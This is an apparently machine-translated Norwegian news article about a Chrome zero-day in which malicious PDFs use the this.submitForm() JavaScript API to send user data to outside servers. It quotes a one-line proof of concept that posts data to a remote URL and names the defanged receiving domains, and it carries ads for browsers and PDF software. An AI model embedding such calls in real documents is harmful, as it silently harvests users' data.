nettlesere

Chrome bug lar hackere samle inn brukerdata via PDF-filer

Chrome bug lar hackere samle inn brukerdata via PDF-filer

Utnyttelsesdeteksjonstjenesten EdgeSpot oppdaget et spennende null-dagers sårbarhet i Chrome som utnytter PDF-dokumenter.

Sårbarheten gjør det mulig for angripere å høste sensitive data ved hjelp av ondsinnede PDF-dokumenter som er åpnet i Chrome. 

Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et ondsinnet program å jobbe i bakgrunnen ved å samle inn brukerdata.

Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter mot følgende data på din PC:

Vær oppmerksom på skadelige PDF-filer

Eksperter oppdaget at det ene av de to domenene readnotify [.] com eller burpcollaborator [.] nett mottok dataene.

De avslørte at angriperne bruker this.submitForm () PDF Javascript API for å samle sensitiv informasjon fra brukerne.

Vi testet det med en minimal PoC, en enkel API-samtale som this.submitForm ('http://google.com/test') vil få Google Chrome til å sende personopplysningene til google.com.

Denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer, begge sirkulerte i henholdsvis oktober 2017 og september 2018.

Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batchen av filer ble samlet ved hjelp av ReadNotifys PDF-sporingstjeneste.

Brukere kan bruke tjenesten for å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten til det andre settet med PDF-filer.

Hurtigtips: Bytt nettleser til Opera

I disse urolige tider blir vi angrepet med skadelig programvare, phishing og trojanere i hvert trinn, så vi må være mye mer årvåkne og være beskyttet.

Og da dette er et spesifikt problem for Chrome, kan du unngå den trusselen og alle andre med en sikkerhetsorientert nettleser som Opera.

Denne nettleseren kommer med en innebygd annonseblokkering som ikke bare fjerner slike distraksjoner, men også blokkerer analyseskript, sporingspiksler og metoder for å samle inn dataene dine. 

Og hvis du vil være helt sikker på at du holder deg unna enhver fare, kan du komme deg bak den innebygde VPN-tjenesten som er 100% gratis å bruke i ubegrenset tid.

Opera

Opera tilbyr den perfekte trusselsbeskyttelsen med den innebygde annonseblokkeringen og VPN-tjenesten gratis! Få det gratis Besøk nettsiden

Hvordan kan jeg være beskyttet mot PDF-sårbarheter?

Last ned Adobe Acrobat PRO

Adobe og Chrome passer godt sammen når det gjelder håndtering av PDF-filer. Ved å installere Adobe Extension for Chrome, kan du se gjennom og manipulere PDF-filer etter eget ønske uten å forlate favorittleseren din.

Til tross for sin robuste struktur, kan det hende at skadelig programvare skjult i PDF-filer ikke blir oppdaget hvis du bruker standardversjonen av Reader.

Den profesjonelle versjonen anbefales for å garantere beskyttelsen din og holde dataene dine borte fra hackere.

Selv om det ikke er gratis, er prisen du vil betale ganske liten for mengden ekstra funksjoner du vil ha, inkludert forbedret sikkerhet for PDF-filene dine.

Det er også en gratis prøveperiode på 7 dager inkludert, slik at du kan få en smak av hele Pro-opplevelsen før du kjøper.

Adobe Acrobat PRO

Hold deg unna skadelig programvare ved å laste ned Adobe Acrobat PRO. Den har mange flere funksjoner enn den gratis versjonen og holder dataene dine trygge. Gratis prøveperiode Besøk nettstedet Les mer

I tilfelle du vil være sikker mens du surfer på internett, må du skaffe deg et fullt dedikert verktøy for å sikre nettverket ditt.  Installer privat internettilgang nå og sikre deg selv. Den beskytter PCen din mot angrep mens du surfer, maskerer IP-adressen din og blokkerer all uønsket tilgang.

Utnyttelsesgjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer fordi oppdateringen ikke var forventet å bli utgitt i nær fremtid..

EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en oppdatering i slutten av april.

Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å se mottatte PDF-dokumenter lokalt ved hjelp av en annen leser-app.

Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett.

FAQ: Lær mer om Chrome-utvidelser

Ja det gjør det. Men hvis du vil ha et bredere utvalg, kan du utforske de beste valgene våre for Chrome-personvernutvidelser i denne komplette veiledningen.

Det er mange utvidelser som tillater behandling av PDF-filer. Ta en titt på vår utmerkede guide om de beste PDF-utvidelsene for Chrome.

Det gjør det ikke, men du kan aktivere det raskt. Her er vår omfattende guide om hvordan du aktiverer QR-kodegeneratoren i Chrome.

Redaktørens merknad: Dette innlegget ble opprinnelig publisert i april 2020 og har siden blitt oppdatert og oppdatert i august 2020 for friskhet, nøyaktighet og omfattende.

vinduer Topp 10 nye funksjoner for bedrifter i Windows 8.1
Topp 10 nye funksjoner for bedrifter i Windows 8.1
Windows 8.1-oppdateringen utgitt av Microsoft kommer med viktige funksjoner for forretnings- og bedriftsbrukere. Vi har valgt topp 9 som kan interesse...
vinduer Nokia 2520 vs iPad Air Video Advertising
Nokia 2520 vs iPad Air Video Advertising
Dette er ikke en kamp med spesifikasjoner, men heller Nokias tar på seg iPad Air med sin siste reklame. Dette er den samme annonseringsfilosofien som ...
vinduer Windows 8.1-nettbrett med Intel Bay Trail 64-biters sjetonger kommer i første kvartal 2014
Windows 8.1-nettbrett med Intel Bay Trail 64-biters sjetonger kommer i første kvartal 2014
Intel forbereder seg på 2014 med Intel Bay Trail-sjetonger som selskapet forventes å avdekke i første kvartal neste år. Men det som er interessant er ...